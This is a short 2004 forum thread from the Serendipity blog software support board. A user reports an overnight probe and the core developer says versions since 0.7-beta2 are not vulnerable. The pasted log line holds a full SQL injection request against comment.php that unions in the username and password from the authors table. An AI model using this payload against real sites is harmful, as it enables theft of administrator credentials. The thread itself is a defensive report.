Hi -
My 7.0b3 s9y installation received this naughty probe overnight.
Was it in reference to a known sql injection bug?
c-24-14-201-184.client.comcast.net [24.14.201.184] - - [13/Oct/2004:00:42:34 -0400] "GET /~fche/blog/comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20/* HTTP/1.1" 200 260 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Security bug probe received
-
garvinhicking
- Core Developer
- Posts: 30022
- Joined: Tue Sep 16, 2003 9:45 pm
- Location: Cologne, Germany
- Contact:
Re: Security bug probe received
Hi!
Yes, I guess so. But as you can see, when calling the URL, all versions since 0.7-beta2 are not vulnerable...
Regards,
Garvin.
Yes, I guess so. But as you can see, when calling the URL, all versions since 0.7-beta2 are not vulnerable...
Regards,
Garvin.
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/